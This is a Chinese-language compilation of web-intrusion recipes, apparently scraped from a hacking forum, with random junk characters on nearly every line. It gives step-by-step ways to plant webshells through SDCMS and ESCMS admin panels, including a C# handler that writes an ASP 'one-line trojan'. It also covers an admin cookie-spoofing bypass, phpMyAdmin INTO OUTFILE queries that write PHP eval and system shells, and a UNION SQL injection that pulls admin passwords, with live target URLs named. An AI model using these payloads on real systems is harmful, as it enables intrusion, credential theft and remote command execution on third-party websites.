<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
6 d" T0 J& L" a# }8 O+ x3 P6 m* QUpload a new file:<br>
$ F4 \+ x$ x% O* i! a0 D( Q<input type="file" name="NewFile" size="50"><br>
! B c& M; a5 ~; ` t! s# M3 p<input id="btnUpload" type="submit" value="Upload"> J* v' n5 ?( d$ o7 I
</form># P- s) u5 H$ D
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 B& g% J9 u8 U: p- F/ g+ X
& n! O: B# r$ L8 `* w: ^, z' l! dSDcms 后台拿webshell6 ^$ f! x# O1 d9 v# ]4 V
3 X, w- l* z( V& P
第一种方法:
' C+ o2 H- x: A/ f, Y( g6 O进入后台-->系统管理-->系统设置-->系统设置->网站名称;1 a! S" H1 x, t
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
7 B7 g0 J) `. a# E0 x/ z( C* d, N用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
2 J0 X1 ?7 w' i第二种方法:5 h/ u, V- R% {) u) Z
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
' Y7 L* u2 Q/ Q6 I1 ^: I在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!2 t( e3 T0 ]! I! \. M$ g
第三种方法:
, Y9 r2 R0 i* f$ c+ Y进入后台-->界面管理-->模板文件管理-->创建文件( E$ k; H0 N* G% t2 }
文件名写入getshell.ashx
- }9 {/ o4 a1 j/ B- m" h2 x内容写入下面内容:; b2 p9 H& }' s7 I! \" p* k! j* q
/====================复制下面的=========================/2 l9 f) f! y) ~4 n/ p( T- `& b( e
<%@ WebHandler Language="C#" Class="Handler" %>
, H0 }$ I) j0 \8 E4 T* ousing System;
; U% Y8 R3 T* ?' Q$ zusing System.Web;
7 Z' O" f# H% f: k/ x/ I$ k! h; W. pusing System.IO;
# b5 [& z2 v% tpublic class Handler : IHttpHandler {
" r) T- }$ d" k: \: n# k5 _public void ProcessRequest (HttpContext context) {
8 w! `, R; H4 B( _; P n* Ocontext.Response.ContentType = "text/plain";" ^4 [, @) p+ F% ]
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
8 H: E9 a, W& e; T( _" t: q/ D2 Z# Ofile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");1 B& R. D ]$ e {7 u" S2 r$ K
file1.Flush();
& A# L& M( j* E# m0 cfile1.Close();
/ C3 s2 }% \& T( g- e3 I}+ o8 U1 f0 Q7 c3 z' ^
public bool IsReusable {8 ]+ \, m) p! h4 r$ O0 x. s
get {$ B( C, x$ n! Y; c5 q5 E o" y
return false;$ K7 y& K7 M9 H0 d F+ j
}( l. e& [+ E2 r( C6 f
}
+ [# v; d3 M/ B$ h6 n}3 V y9 z6 J9 W, e7 t# \" N7 E
/=============================================/
6 |( i5 @/ v/ K* Q3 A1 S4 K2 ^访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
0 F/ ~. O9 X) _2 }8 z* h3 |* h会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
4 _4 ~% h O& R R6 f-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& S2 S- B+ D2 R' i5 |" Z, N$ p& m( V. b( d
ESCMS网站管理系统0day
4 ?) _" O# L5 p! ` c/ i q0 ^ e! X1 e0 ^9 U
后台登陆验证是通过admin/check.asp实现的
8 h! Y. r/ j, d A: O
+ k3 x) s9 @9 R6 S首先我们打开http://target.com/admin/es_index.html) @5 y: i1 g B! b! {7 i
然后在COOKIE结尾加上
6 i: I& f f* ?: u$ w, t; ESCMS$_SP2=ES_admin=st0p;
* D5 r8 h5 ]! ~% A B修改,然后刷新
' x8 u6 U, g3 i1 m进后台了嘎..
6 I! R0 c% }) T! k W: i然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL2 J9 y- |3 s/ I- v% x9 y9 B! g+ U
" b; j' h# h9 n利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.! t5 M k' W6 N8 Z" {1 y3 v
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp# A( k. c+ J* I
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败.." S3 W* A% c; ~2 H! N) \ O
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了4 d* w" n7 v: a, P+ A' Y0 n1 _3 n
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ X: L" [0 k8 ]2 M! q8 c i6 P
; m8 s1 [# u% N5 \; O宁志网站管理系统后台无验证漏洞及修复
( p0 u: v4 L1 c! i6 E
0 }1 h: N( j: P, e. m# ~$ j; O网上搜了一下,好像没有发布.如有雷同纯粹巧合!& l0 q) n$ W; x" Z
官方网站:www.ningzhi.net
$ y: _: ~2 T" t学校网站管理系统 V.2011版本 $ l! R% v4 ^ b" J, `* q1 ?0 r
http://down.chinaz.com/soft/29943.htm
L# o" H3 L1 v; [/ M+ E- c其它版本(如:政府版等),自行下载.
* t; [9 V4 d W6 [& p: V. _3 ^漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
7 [: m. c: N- x( |; b2 c$ u/ o+ Alogin.asp代码如下:1 q1 f' m3 Z7 b, E& `
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
# e2 O% l# j& m- J$ Wmanage.asp代码我就不帖出来了.反正也没验证.$ \" z; R2 {6 X2 g# p: c8 F) u
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!+ s6 _$ Y+ |1 q! y% x
漏洞利用:" B+ |6 {3 o1 C- Y$ [8 ~
直接访问http://www.0855.tv/admin/manage.asp j& E* L) w. f/ `: ?; m
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
5 Y8 b, Z4 L+ E' D- X7 s----------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 j; b8 ~- h4 Z1 r# ~
# \6 l/ }( F8 m% Y' ]
phpmyadmin拿shell的四种方法总结及修复
8 G+ }5 G( Y& l% O$ d* r/ W$ u7 ^2 b5 C: L _, `
方法一:& u$ R$ ]4 u! E- s( X6 S
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
2 N9 ?2 M& s1 C) GINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
" T: c" j' z1 @+ CSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
" X0 _8 r2 h/ O/ F----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php3 W8 |5 d$ \! V
一句话连接密码:7on3 L, ~& |3 F6 w6 X3 u
方法二:: ^" K& E6 t: j
读取文件内容: select load_file('E:/xamp/www/s.php');4 ]0 B) G- \8 k( x) H7 ?
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'* q3 X( X$ y/ P* M; x
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'! N% T) p1 l- M8 o) s1 Q) A
方法三:9 S, B( v, D" p6 U
JhackJ版本 PHPmyadmin拿shell. a' {4 X# a: F, V
Create TABLE study (cmd text NOT NULL);* M. r7 y$ p! f! L0 I
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');% ]9 o: `+ W& t
select cmd from study into outfile 'E:/wamp/www/7.php';. o1 _; Y" \( R5 F- u+ d
Drop TABLE IF EXISTS study;
: W+ P5 F. t' d% f- G0 d0 P<?php eval($_POST[cmd])?> D' f$ r/ R% a
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
6 K! n7 ~# x8 S% Y, M0 lINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 18 f5 D7 A, H" s& ^" Q; y8 |
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1) f7 i& m0 c5 { D
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
. B; K7 ]' L+ e6 ?9 W0 C$ F方法四:7 `: R# F% c( J2 R7 H, H% g
select load_file('E:/xamp/www/study.php');
% h/ Z; b) G2 eselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
2 U( d' O, q% c* z5 b5 I% l1 B然后访问网站目录:http://www.2cto.com/study.php?cmd=dir6 h4 q$ P, W& h$ u) L
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------/ I' A" F! o; X! Z- G
5 `( q6 z& v0 y0 @NO.001中学网站管理系统 Build 110628 注入漏洞; e3 {1 [& `( W
, q% Y- d% ~6 T$ M: P
NO.001中学网站管理系统功能模块:& j2 G& g5 ^( d( i/ _2 N3 C
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
) }2 ~! s' N) D2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
. F' F- X* N F8 s. v3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息+ n! d2 _ W; E7 ~; o% z
4.视频图片管理:一级分类,动态添加视频或者图片等信息2 n1 O& n) V: W3 O
5.留言管理:对留言,修改,删除、回复等管理
+ H" B+ I0 s% K- |6.校友频道:包括校友资料excel导出、管理等功能2 f: x0 f: v1 [! p3 E
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
$ ~+ _3 i9 D& I, N0 R默认后台:admin/login.asp
% `( a- `! r8 v官方演示:http://demo.001cms.net
3 ?5 g2 i- H* `% w: h, V1 B源码下载地址:http://down.chinaz.com/soft/30187.htm: `/ E) ]1 m' W; s$ y9 i; H
EXP:
2 [$ h. v# r6 T2 ~5 Aunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin9 C% P5 Z+ t# l
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin# Q( ~5 v. b# W0 k
getshell:后台有备份,你懂的
& {1 |0 `" O6 M. F% T" Y) y" \另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。1 u! }. `/ T3 f$ G& K7 k
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |